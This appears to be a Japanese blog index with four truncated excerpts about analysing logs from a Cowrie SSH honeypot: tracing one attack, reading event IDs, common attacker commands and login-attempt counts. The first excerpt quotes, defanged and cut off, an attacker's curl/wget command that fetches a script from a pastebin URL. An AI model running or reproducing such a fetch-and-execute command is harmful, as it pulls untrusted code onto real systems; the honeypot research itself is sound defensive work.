4月3日にCowrieに来ていた攻撃を追ってみました。 一番最初にこの攻撃が観測されたのは4月2日4:48(JST)となります。sshでログインし、以下のコマンドを入力していました。 (curl -fsSL hxxps://pastebin[.]com/raw/v5XC0BJh||wget -q -O- hxxps://pastebin[]…

Cowrieについて、ログの読み方をわかる範囲でまとめてみました。cowrieはeventidを見ることで、ログに記載される情報が変わります。 また、各種ログはsessionフィールドによって紐づけることができます。 cowrie.client.kex cowrieに接続してきたSSHクライア…

Cowrieのログを見てみた。今回はloginして後、お客様(攻撃者)がよく打つコマンドを見てみようと思う。よく入力されるコマンドTOP３は 順位 コマンド 1位 cat /proc/cpuinfo | grep name | wc -l 2位 uname -n -s -r -v 3位 uname -a ; lscpu 1位のコマンドは…

Cowrieのログを見てみた。 まだログの見方がいろいろと分かっていないため、 とりあえずUser/Passwordあたりを見ていこうと思う。2019/02/23 - 2019/02/26の間でログイン試行は、33317件あった。 こんなにも来るんですね…全組み合わせは載せれないので、 と…